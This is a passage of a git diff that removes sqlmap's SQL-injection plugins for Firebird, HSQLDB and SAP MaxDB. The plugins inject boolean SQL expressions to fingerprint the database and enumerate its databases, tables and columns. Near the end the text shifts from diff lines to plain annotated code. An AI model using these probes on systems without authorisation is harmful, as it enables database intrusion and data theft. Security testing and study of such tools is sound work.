lib.core.enums import DBMS -from lib.core.session import setDbms -from lib.core.settings import FIREBIRD_ALIASES -from lib.core.settings import METADB_SUFFIX -from lib.core.settings import UNKNOWN_DBMS_VERSION -from lib.request import inject -from plugins.generic.fingerprint import Fingerprint as GenericFingerprint - -class Fingerprint(GenericFingerprint): - def __init__(self): - GenericFingerprint.__init__(self, DBMS.FIREBIRD) - - def getFingerprint(self): - value = "" - wsOsFp = Format.getOs("web server", kb.headersFp) - - if wsOsFp: - value += "%s\n" % wsOsFp - - if kb.data.banner: - dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) - - if dbmsOsFp: - value += "%s\n" % dbmsOsFp - - value += "back-end DBMS: " - actVer = Format.getDbms() - - if not conf.extensiveFp: - value += actVer - return value - - actVer = Format.getDbms() + " (%s)" % (self._dialectCheck()) - blank = " " * 15 - value += "active fingerprint: %s" % actVer - - if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] - - if re.search("-log$", kb.data.banner): - banVer += ", logging enabled" - - banVer = Format.getDbms([banVer]) - value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) - - htmlErrorFp = Format.getErrorParsedDBMSes() - - if htmlErrorFp: - value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) - - return value - - def _sysTablesCheck(self): - retVal = None - table = ( - ("1.0", ("EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)",)), - ("1.5", ("NULLIF(%d,%d) IS NULL", "EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)")), - ("2.0", ("EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)", "BIT_LENGTH(%d)>0", "CHAR_LENGTH(%d)>0")), - ("2.1", ("BIN_XOR(%d,%d)=0", "PI()>0.%d", "RAND()<1.%d", "FLOOR(1.%d)>=0")), - # TODO: add test for Firebird 2.5 - ) - - for i in xrange(len(table)): - version, checks = table[i] - failed = False - check = checks[randomRange(0, len(checks) - 1)].replace("%d", getUnicode(randomRange(1, 100))) - result = 
inject.checkBooleanExpression(check) - - if result: - retVal = version - else: - failed = True - break - - if failed: - break - - return retVal - - def _dialectCheck(self): - retVal = None - - if Backend.getIdentifiedDbms(): - result = inject.checkBooleanExpression("EXISTS(SELECT CURRENT_DATE FROM RDB$DATABASE)") - retVal = "dialect 3" if result else "dialect 1" - - return retVal - - def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(FIREBIRD_ALIASES) \ - or (conf.dbms or "").lower() in FIREBIRD_ALIASES) and Backend.getVersion() and \ - Backend.getVersion() != UNKNOWN_DBMS_VERSION: - v = Backend.getVersion().replace(">", "") - v = v.replace("=", "") - v = v.replace(" ", "") - - Backend.setVersion(v) - - setDbms("%s %s" % (DBMS.FIREBIRD, Backend.getVersion())) - - self.getBanner() - - return True - - infoMsg = "testing %s" % DBMS.FIREBIRD - logger.info(infoMsg) - - result = inject.checkBooleanExpression("(SELECT COUNT(*) FROM RDB$DATABASE WHERE [RANDNUM]=[RANDNUM])>0") - - if result: - infoMsg = "confirming %s" % DBMS.FIREBIRD - logger.info(infoMsg) - - result = inject.checkBooleanExpression("EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)") - - if not result: - warnMsg = "the back-end DBMS is not %s" % DBMS.FIREBIRD - logger.warn(warnMsg) - - return False - - setDbms(DBMS.FIREBIRD) - - infoMsg = "actively fingerprinting %s" % DBMS.FIREBIRD - logger.info(infoMsg) - - version = self._sysTablesCheck() - - if version is not None: - Backend.setVersion(version) - setDbms("%s %s" % (DBMS.FIREBIRD, version)) - - self.getBanner() - - return True - else: - warnMsg = "the back-end DBMS is not %s" % DBMS.FIREBIRD - logger.warn(warnMsg) - - return False - - def forceDbmsEnum(self): - conf.db = "%s%s" % (DBMS.FIREBIRD, METADB_SUFFIX) - - if conf.tbl: - conf.tbl = conf.tbl.upper() diff --git a/plugins/dbms/firebird/syntax.py b/plugins/dbms/firebird/syntax.py deleted file mode 100644 index e8d340bd..00000000 --- a/plugins/dbms/firebird/syntax.py +++ /dev/null 
@@ -1,37 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.common import Backend -from lib.core.common import isDBMSVersionAtLeast -from plugins.generic.syntax import Syntax as GenericSyntax - -class Syntax(GenericSyntax): - def __init__(self): - GenericSyntax.__init__(self) - - @staticmethod - def escape(expression, quote=True): - """ - >>> Backend.setVersion('2.0') - ['2.0'] - >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") - "SELECT 'abcdefgh' FROM foobar" - >>> Backend.setVersion('2.1') - ['2.1'] - >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") - 'SELECT ASCII_CHAR(97)||ASCII_CHAR(98)||ASCII_CHAR(99)||ASCII_CHAR(100)||ASCII_CHAR(101)||ASCII_CHAR(102)||ASCII_CHAR(103)||ASCII_CHAR(104) FROM foobar' - """ - - def escaper(value): - return "||".join("ASCII_CHAR(%d)" % ord(_) for _ in value) - - retVal = expression - - if isDBMSVersionAtLeast("2.1"): - retVal = Syntax._escape(expression, quote, escaper) - - return retVal diff --git a/plugins/dbms/firebird/takeover.py b/plugins/dbms/firebird/takeover.py deleted file mode 100644 index 79e87dc8..00000000 --- a/plugins/dbms/firebird/takeover.py +++ /dev/null @@ -1,31 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.exception import SqlmapUnsupportedFeatureException -from plugins.generic.takeover import Takeover as GenericTakeover - -class Takeover(GenericTakeover): - def __init__(self): - GenericTakeover.__init__(self) - - def osCmd(self): - errMsg = "on Firebird it is not possible to execute commands" - raise SqlmapUnsupportedFeatureException(errMsg) - - def osShell(self): - errMsg = "on Firebird it is not possible to execute commands" - raise SqlmapUnsupportedFeatureException(errMsg) - - def osPwn(self): - errMsg = "on Firebird it is not possible to establish an " - 
errMsg += "out-of-band connection" - raise SqlmapUnsupportedFeatureException(errMsg) - - def osSmb(self): - errMsg = "on Firebird it is not possible to establish an " - errMsg += "out-of-band connection" - raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/hsqldb/__init__.py b/plugins/dbms/hsqldb/__init__.py deleted file mode 100644 index 6e73f59f..00000000 --- a/plugins/dbms/hsqldb/__init__.py +++ /dev/null @@ -1,33 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import DBMS -from lib.core.settings import HSQLDB_SYSTEM_DBS -from lib.core.unescaper import unescaper -from plugins.dbms.hsqldb.enumeration import Enumeration -from plugins.dbms.hsqldb.filesystem import Filesystem -from plugins.dbms.hsqldb.fingerprint import Fingerprint -from plugins.dbms.hsqldb.syntax import Syntax -from plugins.dbms.hsqldb.takeover import Takeover -from plugins.generic.misc import Miscellaneous - -class HSQLDBMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): - """ - This class defines HSQLDB methods - """ - - def __init__(self): - self.excludeDbsList = HSQLDB_SYSTEM_DBS - - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - Filesystem.__init__(self) - Miscellaneous.__init__(self) - Takeover.__init__(self) - - unescaper[DBMS.HSQLDB] = Syntax.escape diff --git a/plugins/dbms/hsqldb/connector.py b/plugins/dbms/hsqldb/connector.py deleted file mode 100644 index 48fc5aef..00000000 --- a/plugins/dbms/hsqldb/connector.py +++ /dev/null @@ -1,94 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -try: - import jaydebeapi - import jpype -except ImportError, msg: - pass - -import logging - -from lib.core.common import checkFile -from lib.core.common import readInput -from 
lib.core.data import conf -from lib.core.data import logger -from lib.core.exception import SqlmapConnectionException -from plugins.generic.connector import Connector as GenericConnector - -class Connector(GenericConnector): - """ - Homepage: https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/ - User guide: https://pypi.python.org/pypi/JayDeBeApi/#usage & http://jpype.sourceforge.net/doc/user-guide/userguide.html - API: - - Debian package: - - License: LGPL & Apache License 2.0 - """ - - def __init__(self): - GenericConnector.__init__(self) - - def connect(self): - self.initConnection() - try: - msg = "what's the location of 'hsqldb.jar'? " - jar = readInput(msg) - checkFile(jar) - args = "-Djava.class.path=%s" % jar - jvm_path = jpype.getDefaultJVMPath() - jpype.startJVM(jvm_path, args) - except Exception, msg: - raise SqlmapConnectionException(msg[0]) - - try: - driver = 'org.hsqldb.jdbc.JDBCDriver' - connection_string = 'jdbc:hsqldb:mem:.' #'jdbc:hsqldb:hsql://%s/%s' % (self.hostname, self.db) - self.connector = jaydebeapi.connect(driver, - connection_string, - str(self.user), - str(self.password)) - except Exception, msg: - raise SqlmapConnectionException(msg[0]) - - self.initCursor() - self.printConnected() - - def fetchall(self): - try: - return self.cursor.fetchall() - except Exception, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) - return None - - def execute(self, query): - retVal = False - - try: - self.cursor.execute(query) - retVal = True - except Exception, msg: #todo fix with specific error - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[1]) - - self.connector.commit() - - return retVal - - def select(self, query): - retVal = None - - upper_query = query.upper() - - if query and not (upper_query.startswith("SELECT ") or upper_query.startswith("VALUES ")): - query = "VALUES %s" % query - - if query and upper_query.startswith("SELECT ") and " 
FROM " not in upper_query: - query = "%s FROM (VALUES(0))" % query - - self.cursor.execute(query) - retVal = self.cursor.fetchall() - - return retVal diff --git a/plugins/dbms/hsqldb/enumeration.py b/plugins/dbms/hsqldb/enumeration.py deleted file mode 100644 index 86977408..00000000 --- a/plugins/dbms/hsqldb/enumeration.py +++ /dev/null @@ -1,46 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from plugins.generic.enumeration import Enumeration as GenericEnumeration -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import queries -from lib.core.common import Backend -from lib.core.common import unArrayizeValue -from lib.core.settings import HSQLDB_DEFAULT_SCHEMA -from lib.request import inject - -class Enumeration(GenericEnumeration): - def __init__(self): - GenericEnumeration.__init__(self) - - def getBanner(self): - if not conf.getBanner: - return - - if kb.data.banner is None: - infoMsg = "fetching banner" - logger.info(infoMsg) - - query = queries[Backend.getIdentifiedDbms()].banner.query - kb.data.banner = unArrayizeValue(inject.getValue(query, safeCharEncode=True)) - - return kb.data.banner - - def getPrivileges(self, *args): - warnMsg = "on HSQLDB it is not possible to enumerate the user privileges" - logger.warn(warnMsg) - - return {} - - def getHostname(self): - warnMsg = "on HSQLDB it is not possible to enumerate the hostname" - logger.warn(warnMsg) - - def getCurrentDb(self): - return HSQLDB_DEFAULT_SCHEMA diff --git a/plugins/dbms/hsqldb/filesystem.py b/plugins/dbms/hsqldb/filesystem.py deleted file mode 100644 index e3dedad9..00000000 --- a/plugins/dbms/hsqldb/filesystem.py +++ /dev/null @@ -1,21 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from 
lib.core.exception import SqlmapUnsupportedFeatureException -from plugins.generic.filesystem import Filesystem as GenericFilesystem - -class Filesystem(GenericFilesystem): - def __init__(self): - GenericFilesystem.__init__(self) - - def readFile(self, rFile): - errMsg = "on HSQLDB it is not possible to read files" - raise SqlmapUnsupportedFeatureException(errMsg) - - def writeFile(self, wFile, dFile, fileType=None, forceCheck=False): - errMsg = "on HSQLDB it is not possible to read files" - raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/hsqldb/fingerprint.py b/plugins/dbms/hsqldb/fingerprint.py deleted file mode 100644 index 4198d299..00000000 --- a/plugins/dbms/hsqldb/fingerprint.py +++ /dev/null @@ -1,144 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.common import Backend -from lib.core.common import Format -from lib.core.common import unArrayizeValue -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.enums import DBMS -from lib.core.session import setDbms -from lib.core.settings import HSQLDB_ALIASES -from lib.core.settings import UNKNOWN_DBMS_VERSION -from lib.request import inject -from plugins.generic.fingerprint import Fingerprint as GenericFingerprint - -class Fingerprint(GenericFingerprint): - def __init__(self): - GenericFingerprint.__init__(self, DBMS.HSQLDB) - - def getFingerprint(self): - value = "" - wsOsFp = Format.getOs("web server", kb.headersFp) - - if wsOsFp and not hasattr(conf, "api"): - value += "%s\n" % wsOsFp - - if kb.data.banner: - dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) - - if dbmsOsFp and not hasattr(conf, "api"): - value += "%s\n" % dbmsOsFp - - value += "back-end DBMS: " - actVer = Format.getDbms() - - if not conf.extensiveFp: - value += actVer - return value - - blank = " " * 15 - value += 
"active fingerprint: %s" % actVer - - if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] if 'dbmsVersion' in kb.bannerFp else None - - if re.search("-log$", kb.data.banner): - banVer += ", logging enabled" - - banVer = Format.getDbms([banVer] if banVer else None) - value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) - - htmlErrorFp = Format.getErrorParsedDBMSes() - - if htmlErrorFp: - value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) - - return value - - def checkDbms(self): - """ - References for fingerprint: - DATABASE_VERSION() - version 2.2.6 added two-arg REPLACE functio REPLACE('a','a') compared to REPLACE('a','a','d') - version 2.2.5 added SYSTIMESTAMP function - version 2.2.3 added REGEXPR_SUBSTRING and REGEXPR_SUBSTRING_ARRAY functions - version 2.2.0 added support for ROWNUM() function - version 2.1.0 added MEDIAN aggregate function - version < 2.0.1 added support for datetime ROUND and TRUNC functions - version 2.0.0 added VALUES support - version 1.8.0.4 Added org.hsqldbdb.Library function, getDatabaseFullProductVersion to return the - full version string, including the 4th digit (e.g 1.8.0.4). 
- version 1.7.2 CASE statements added and INFORMATION_SCHEMA - - """ - - if not conf.extensiveFp and (Backend.isDbmsWithin(HSQLDB_ALIASES) \ - or (conf.dbms or "").lower() in HSQLDB_ALIASES) and Backend.getVersion() and \ - Backend.getVersion() != UNKNOWN_DBMS_VERSION: - v = Backend.getVersion().replace(">", "") - v = v.replace("=", "") - v = v.replace(" ", "") - - Backend.setVersion(v) - - setDbms("%s %s" % (DBMS.HSQLDB, Backend.getVersion())) - - if Backend.isVersionGreaterOrEqualThan("1.7.2"): - kb.data.has_information_schema = True - - self.getBanner() - - return True - - infoMsg = "testing %s" % DBMS.HSQLDB - logger.info(infoMsg) - - result = inject.checkBooleanExpression("CASEWHEN(1=1,1,0)=1") - - if result: - infoMsg = "confirming %s" % DBMS.HSQLDB - logger.info(infoMsg) - - result = inject.checkBooleanExpression("ROUNDMAGIC(PI())>=3") - - if not result: - warnMsg = "the back-end DBMS is not %s" % DBMS.HSQLDB - logger.warn(warnMsg) - - return False - else: - kb.data.has_information_schema = True - Backend.setVersion(">= 1.7.2") - setDbms("%s 1.7.2" % DBMS.HSQLDB) - - banner = self.getBanner() - if banner: - Backend.setVersion("= %s" % banner) - else: - if inject.checkBooleanExpression("(SELECT [RANDNUM] FROM (VALUES(0)))=[RANDNUM]"): - Backend.setVersionList([">= 2.0.0", "< 2.3.0"]) - else: - banner = unArrayizeValue(inject.getValue("\"org.hsqldbdb.Library.getDatabaseFullProductVersion\"()", safeCharEncode=True)) - if banner: - Backend.setVersion("= %s" % banner) - else: - Backend.setVersionList([">= 1.7.2", "< 1.8.0"]) - - return True - else: - warnMsg = "the back-end DBMS is not %s or version is < 1.7.2" % DBMS.HSQLDB - logger.warn(warnMsg) - - return False - - def getHostname(self): - warnMsg = "on HSQLDB it is not possible to enumerate the hostname" - logger.warn(warnMsg) diff --git a/plugins/dbms/hsqldb/syntax.py b/plugins/dbms/hsqldb/syntax.py deleted file mode 100644 index 0b8864be..00000000 --- a/plugins/dbms/hsqldb/syntax.py +++ /dev/null @@ -1,24 
+0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from plugins.generic.syntax import Syntax as GenericSyntax - -class Syntax(GenericSyntax): - def __init__(self): - GenericSyntax.__init__(self) - - @staticmethod - def escape(expression, quote=True): - """ - >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") - 'SELECT CHAR(97)||CHAR(98)||CHAR(99)||CHAR(100)||CHAR(101)||CHAR(102)||CHAR(103)||CHAR(104) FROM foobar' - """ - - def escaper(value): - return "||".join("CHAR(%d)" % ord(value[i]) for i in xrange(len(value))) - - return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/hsqldb/takeover.py b/plugins/dbms/hsqldb/takeover.py deleted file mode 100644 index ad241da0..00000000 --- a/plugins/dbms/hsqldb/takeover.py +++ /dev/null @@ -1,31 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.exception import SqlmapUnsupportedFeatureException -from plugins.generic.takeover import Takeover as GenericTakeover - -class Takeover(GenericTakeover): - def __init__(self): - GenericTakeover.__init__(self) - - def osCmd(self): - errMsg = "on HSQLDB it is not possible to execute commands" - raise SqlmapUnsupportedFeatureException(errMsg) - - def osShell(self): - errMsg = "on HSQLDB it is not possible to execute commands" - raise SqlmapUnsupportedFeatureException(errMsg) - - def osPwn(self): - errMsg = "on HSQLDB it is not possible to establish an " - errMsg += "out-of-band connection" - raise SqlmapUnsupportedFeatureException(errMsg) - - def osSmb(self): - errMsg = "on HSQLDB it is not possible to establish an " - errMsg += "out-of-band connection" - raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/maxdb/__init__.py b/plugins/dbms/maxdb/__init__.py deleted file mode 100644 index dca58056..00000000 --- 
a/plugins/dbms/maxdb/__init__.py +++ /dev/null @@ -1,33 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import DBMS -from lib.core.settings import MAXDB_SYSTEM_DBS -from lib.core.unescaper import unescaper -from plugins.dbms.maxdb.enumeration import Enumeration -from plugins.dbms.maxdb.filesystem import Filesystem -from plugins.dbms.maxdb.fingerprint import Fingerprint -from plugins.dbms.maxdb.syntax import Syntax -from plugins.dbms.maxdb.takeover import Takeover -from plugins.generic.misc import Miscellaneous - -class MaxDBMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): - """ - This class defines SAP MaxDB methods - """ - - def __init__(self): - self.excludeDbsList = MAXDB_SYSTEM_DBS - - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - Filesystem.__init__(self) - Miscellaneous.__init__(self) - Takeover.__init__(self) - - unescaper[DBMS.MAXDB] = Syntax.escape diff --git a/plugins/dbms/maxdb/connector.py b/plugins/dbms/maxdb/connector.py deleted file mode 100644 index 06aef635..00000000 --- a/plugins/dbms/maxdb/connector.py +++ /dev/null @@ -1,18 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.exception import SqlmapUnsupportedFeatureException -from plugins.generic.connector import Connector as GenericConnector - -class Connector(GenericConnector): - def __init__(self): - GenericConnector.__init__(self) - - def connect(self): - errMsg = "on SAP MaxDB it is not possible to establish a " - errMsg += "direct connection" - raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/maxdb/enumeration.py b/plugins/dbms/maxdb/enumeration.py deleted file mode 100644 index 1c339963..00000000 --- a/plugins/dbms/maxdb/enumeration.py +++ /dev/null 
class Enumeration(GenericEnumeration):
    """
    SAP MaxDB enumeration support.

    MaxDB lacks the usual LIMIT/OFFSET machinery, so inband queries are
    wrapped through pivotDumpTable() (blind pivot dumping) instead of being
    fetched directly. Several generic features (password hashes, privileges,
    database search, hostname) are explicitly unsupported.
    """

    def __init__(self):
        GenericEnumeration.__init__(self)

        # MaxDB pivot dumps return identifiers with '_' where spaces were;
        # this post-processing hook restores them
        kb.data.processChar = lambda x: x.replace('_', ' ') if x else x

    def getPasswordHashes(self):
        # Not retrievable on MaxDB - return an empty mapping so callers
        # can iterate safely
        warnMsg = "on SAP MaxDB it is not possible to enumerate the user password hashes"
        logger.warn(warnMsg)

        return {}

    def getDbs(self):
        """Return the list of database (schema) names, using the session cache when present."""
        if len(kb.data.cachedDbs) > 0:
            return kb.data.cachedDbs

        infoMsg = "fetching database names"
        logger.info(infoMsg)

        rootQuery = queries[Backend.getIdentifiedDbms()].dbs
        randStr = randomStr()
        query = rootQuery.inband.query
        # Pivot-dump the schema names (no direct inband retrieval on MaxDB)
        retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.schemaname' % randStr], blind=True)

        if retVal:
            kb.data.cachedDbs = retVal[0].values()[0]

        if kb.data.cachedDbs:
            kb.data.cachedDbs.sort()

        return kb.data.cachedDbs

    def getTables(self, bruteForce=None):
        """
        Return a dict {database: [table, ...]} for the databases selected via
        conf.db (or all databases), using the session cache when present.
        """
        if len(kb.data.cachedTables) > 0:
            return kb.data.cachedTables

        self.forceDbmsEnum()

        if conf.db == CURRENT_DB:
            conf.db = self.getCurrentDb()

        if conf.db:
            dbs = conf.db.split(",")
        else:
            dbs = self.getDbs()

        for db in filter(None, dbs):
            dbs[dbs.index(db)] = safeSQLIdentificatorNaming(db)

        infoMsg = "fetching tables for database"
        infoMsg += "%s: %s" % ("s" if len(dbs) > 1 else "", ", ".join(db if isinstance(db, basestring) else db[0] for db in sorted(dbs)))
        logger.info(infoMsg)

        rootQuery = queries[Backend.getIdentifiedDbms()].tables

        for db in dbs:
            randStr = randomStr()
            # "USER" is MaxDB's pseudo-schema keyword and must not be quoted
            query = rootQuery.inband.query % (("'%s'" % db) if db != "USER" else 'USER')
            retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.tablename' % randStr], blind=True)

            if retVal:
                for table in retVal[0].values()[0]:
                    if db not in kb.data.cachedTables:
                        kb.data.cachedTables[db] = [table]
                    else:
                        kb.data.cachedTables[db].append(table)

        for db, tables in kb.data.cachedTables.items():
            kb.data.cachedTables[db] = sorted(tables) if tables else tables

        return kb.data.cachedTables

    def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMode=False):
        """
        Return {database: {table: {column: type}}} for the selected tables.

        NOTE(review): mutates conf.db/conf.tbl/conf.col as it works - callers
        rely on this side effect; statement order matters throughout.
        """
        self.forceDbmsEnum()

        if conf.db is None or conf.db == CURRENT_DB:
            if conf.db is None:
                warnMsg = "missing database parameter. sqlmap is going "
                warnMsg += "to use the current database to enumerate "
                warnMsg += "table(s) columns"
                logger.warn(warnMsg)

            conf.db = self.getCurrentDb()

        elif conf.db is not None:
            # Column enumeration is single-database only on MaxDB
            if ',' in conf.db:
                errMsg = "only one database name is allowed when enumerating "
                errMsg += "the tables' columns"
                raise SqlmapMissingMandatoryOptionException(errMsg)

        conf.db = safeSQLIdentificatorNaming(conf.db)

        if conf.col:
            colList = conf.col.split(",")
        else:
            colList = []

        if conf.excludeCol:
            colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')]

        for col in colList:
            colList[colList.index(col)] = safeSQLIdentificatorNaming(col)

        if conf.tbl:
            tblList = conf.tbl.split(",")
        else:
            self.getTables()

            if len(kb.data.cachedTables) > 0:
                tblList = kb.data.cachedTables.values()

                if isinstance(tblList[0], (set, tuple, list)):
                    tblList = tblList[0]
            else:
                errMsg = "unable to retrieve the tables "
                errMsg += "on database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
                raise SqlmapNoneDataException(errMsg)

        for tbl in tblList:
            tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl, True)

        if bruteForce:
            # Resume previously brute-forced columns when available instead
            # of re-running the (expensive) existence checks
            resumeAvailable = False

            for tbl in tblList:
                for db, table, colName, colType in kb.brute.columns:
                    if db == conf.db and table == tbl:
                        resumeAvailable = True
                        break

            if resumeAvailable and not conf.freshQueries or colList:
                columns = {}

                for column in colList:
                    columns[column] = None

                for tbl in tblList:
                    for db, table, colName, colType in kb.brute.columns:
                        if db == conf.db and table == tbl:
                            columns[colName] = colType

                    if conf.db in kb.data.cachedColumns:
                        kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)] = columns
                    else:
                        kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = {safeSQLIdentificatorNaming(tbl, True): columns}

                return kb.data.cachedColumns

            message = "do you want to use common column existence check? [y/N/q] "
            test = readInput(message, default="Y" if "Y" in message else "N")

            if test[0] in ("n", "N"):
                return
            elif test[0] in ("q", "Q"):
                raise SqlmapUserQuitException
            else:
                return columnExists(paths.COMMON_COLUMNS)

        rootQuery = queries[Backend.getIdentifiedDbms()].columns

        for tbl in tblList:
            # Serve cached columns when this db/table pair was already fetched
            if conf.db is not None and len(kb.data.cachedColumns) > 0 \
               and conf.db in kb.data.cachedColumns and tbl in \
               kb.data.cachedColumns[conf.db]:
                infoMsg = "fetched tables' columns on "
                infoMsg += "database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
                logger.info(infoMsg)

                return {conf.db: kb.data.cachedColumns[conf.db]}

            if dumpMode and colList:
                # Dump mode with an explicit column list: trust the caller,
                # skip the remote round-trip
                table = {}
                table[safeSQLIdentificatorNaming(tbl)] = dict((_, None) for _ in colList)
                kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table
                continue

            infoMsg = "fetching columns "
            infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl)
            infoMsg += "on database '%s'" % unsafeSQLIdentificatorNaming(conf.db)
            logger.info(infoMsg)

            randStr = randomStr()
            query = rootQuery.inband.query % (unsafeSQLIdentificatorNaming(tbl), ("'%s'" % unsafeSQLIdentificatorNaming(conf.db)) if unsafeSQLIdentificatorNaming(conf.db) != "USER" else 'USER')
            retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.columnname' % randStr, '%s.datatype' % randStr, '%s.len' % randStr], blind=True)

            if retVal:
                table = {}
                columns = {}

                for columnname, datatype, length in zip(retVal[0]["%s.columnname" % randStr], retVal[0]["%s.datatype" % randStr], retVal[0]["%s.len" % randStr]):
                    columns[safeSQLIdentificatorNaming(columnname)] = "%s(%s)" % (datatype, length)

                table[tbl] = columns
                kb.data.cachedColumns[conf.db] = table

        return kb.data.cachedColumns

    def getPrivileges(self, *args):
        # Not retrievable on MaxDB - return an empty mapping
        warnMsg = "on SAP MaxDB it is not possible to enumerate the user privileges"
        logger.warn(warnMsg)

        return {}

    def searchDb(self):
        # Database search is unsupported - return an empty list
        warnMsg = "on SAP MaxDB it is not possible to search databases"
        logger.warn(warnMsg)

        return []

    def getHostname(self):
        # Hostname enumeration is unsupported (implicitly returns None)
        warnMsg = "on SAP MaxDB it is not possible to enumerate the hostname"
        logger.warn(warnMsg)
GenericFingerprint.__init__(self, DBMS.MAXDB) - - def _versionCheck(self): - infoMsg = "executing %s SYSINFO version check" % DBMS.MAXDB - logger.info(infoMsg) - - query = agent.prefixQuery("/* NoValue */") - query = agent.suffixQuery(query) - payload = agent.payload(newValue=query) - result = Request.queryPage(payload) - - if not result: - warnMsg = "unable to perform %s version check" % DBMS.MAXDB - logger.warn(warnMsg) - - return None - - minor, major = None, None - - for version in (6, 7): - result = inject.checkBooleanExpression("%d=(SELECT MAJORVERSION FROM SYSINFO.VERSION)" % version) - - if result: - major = version - - for version in xrange(0, 10): - result = inject.checkBooleanExpression("%d=(SELECT MINORVERSION FROM SYSINFO.VERSION)" % version) - - if result: - minor = version - - if major and minor: - return "%s.%s" % (major, minor) - else: - return None - - def getFingerprint(self): - value = "" - wsOsFp = Format.getOs("web server", kb.headersFp) - - if wsOsFp: - value += "%s\n" % wsOsFp - - if kb.data.banner: - dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) - - if dbmsOsFp: - value += "%s\n" % dbmsOsFp - - blank = " " * 15 - value += "back-end DBMS: " - - if not conf.extensiveFp: - value += DBMS.MAXDB - return value - - actVer = Format.getDbms() + " (%s)" % self._versionCheck() - blank = " " * 15 - value += "active fingerprint: %s" % actVer - - if kb.bannerFp: - value += "\n%sbanner parsing fingerprint: -" % blank - - htmlErrorFp = Format.getErrorParsedDBMSes() - - if htmlErrorFp: - value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) - - return value - - def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(MAXDB_ALIASES) or (conf.dbms or "").lower() in MAXDB_ALIASES): - setDbms(DBMS.MAXDB) - - self.getBanner() - - return True - - infoMsg = "testing %s" % DBMS.MAXDB - logger.info(infoMsg) - - result = inject.checkBooleanExpression("ALPHA(NULL) IS NULL") - - if result: - infoMsg = "confirming %s" % 
class Syntax(GenericSyntax):
    """
    SQL syntax helpers for SAP MaxDB.

    Unlike most other DBMS plugins, MaxDB payloads are used verbatim:
    no CHAR()-style rewriting of quoted literals is performed, so the
    escape step is an identity transformation.
    """

    def __init__(self):
        GenericSyntax.__init__(self)

